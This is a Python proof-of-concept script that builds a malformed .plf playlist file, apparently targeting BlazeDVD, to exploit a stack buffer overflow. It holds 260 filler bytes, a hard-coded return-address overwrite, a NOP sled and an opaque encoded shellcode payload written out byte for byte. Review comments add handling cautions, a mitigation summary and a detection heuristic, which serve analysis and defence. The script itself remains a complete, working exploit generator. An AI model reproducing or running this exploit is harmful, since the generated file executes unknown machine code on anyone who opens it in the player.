blazedvd-exploit.py
#!/usr/bin/env python3
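# Proof-of-concept generator for a malformed .plf playlist file that
# demonstrates a stack-based buffer overflow. The layout is: 260 filler bytes,
# a 4-byte value that lands on the saved return address, a NOP run, and an
# opaque machine-code payload.
# NOTE(review): the target is presumably BlazeDVD, going by the output path and
# file name; the affected version is not stated here, so confirm it first.
#
# Handling: the generated file carries live, encoded machine code whose
# behaviour cannot be determined from this script. Treat it as a malware
# sample: keep it inside an isolated analysis VM and do not open it with the
# player on a host you care about.
#
# Defensive context: the technique depends on an unchecked copy into a
# fixed-size stack buffer, an executable stack, and a module loaded at a
# predictable address. Stack cookies, DEP/NX and ASLR each break one of those
# assumptions. For detection, a playlist is normally expected to hold
# plain-text entries, so a long run of one repeated byte followed by
# non-printable data is a strong anomaly signal (confirm the real .plf format).

# Output location; this is a VM shared folder, so the file also becomes
# visible on the host side of the share.
payload_loc = "/media/sf_VM_Shared/BlazeDVD/exploit.plf"

# Bytes that must not appear in the buffer. This script never checks against
# the list; presumably it was applied when the payload below was generated.
badchars = b"\x00\x0a\x1a"

buf = b""
buf += b"A"*260 # junk: filler up to the saved return address
# Hard-coded return address (little-endian 0x7e429353). A fixed absolute
# address only holds for one specific module build and fails when ASLR
# relocates the module. NOTE(review): which DLL this points into is not
# recorded here.
buf += b"\x53\x93\x42\x7e" # EIP overwrite with JMP ESP
buf += b"\x90"*50 # NOP sled for ESP and decoder
# Opaque encoded payload, kept byte-for-byte. The original comment above
# mentions a decoder, so this is presumably self-decoding shellcode; what it
# does after decoding is not documented in this file.
buf += b"\xbe\xb8\x39\xc1\x59\xd9\xc8\xd9\x74\x24\xf4\x5b\x31"
buf += b"\xc9\xb1\x31\x83\xc3\x04\x31\x73\x0f\x03\x73\xb7\xdb"
buf += b"\x34\xa5\x2f\x99\xb7\x56\xaf\xfe\x3e\xb3\x9e\x3e\x24"
buf += b"\xb7\xb0\x8e\x2e\x95\x3c\x64\x62\x0e\xb7\x08\xab\x21"
buf += b"\x70\xa6\x8d\x0c\x81\x9b\xee\x0f\x01\xe6\x22\xf0\x38"
buf += b"\x29\x37\xf1\x7d\x54\xba\xa3\xd6\x12\x69\x54\x53\x6e"
buf += b"\xb2\xdf\x2f\x7e\xb2\x3c\xe7\x81\x93\x92\x7c\xd8\x33"
buf += b"\x14\x51\x50\x7a\x0e\xb6\x5d\x34\xa5\x0c\x29\xc7\x6f"
buf += b"\x5d\xd2\x64\x4e\x52\x21\x74\x96\x54\xda\x03\xee\xa7"
buf += b"\x67\x14\x35\xda\xb3\x91\xae\x7c\x37\x01\x0b\x7d\x94"
buf += b"\xd4\xd8\x71\x51\x92\x87\x95\x64\x77\xbc\xa1\xed\x76"
buf += b"\x13\x20\xb5\x5c\xb7\x69\x6d\xfc\xee\xd7\xc0\x01\xf0"
buf += b"\xb8\xbd\xa7\x7a\x54\xa9\xd5\x20\x32\x2c\x6b\x5f\x70"
buf += b"\x2e\x73\x60\x24\x47\x42\xeb\xab\x10\x5b\x3e\x88\xff"
buf += b"\xb9\xeb\xe4\x97\x67\x7e\x45\xfa\x97\x54\x89\x03\x14"
buf += b"\x5d\x71\xf0\x04\x14\x74\xbc\x82\xc4\x04\xad\x66\xeb"
buf += b"\xbb\xce\xa2\x88\x5a\x5d\x2e\x61\xf9\xe5\xd5\x7d"

# The original opened the file at the top of the script and never closed it,
# relying on interpreter exit to flush the data. A context manager guarantees
# the handle is flushed and closed, and opening only after the buffer is built
# avoids leaving a truncated file behind if anything above raises.
with open(payload_loc, "wb") as out_file:
    out_file.write(buf)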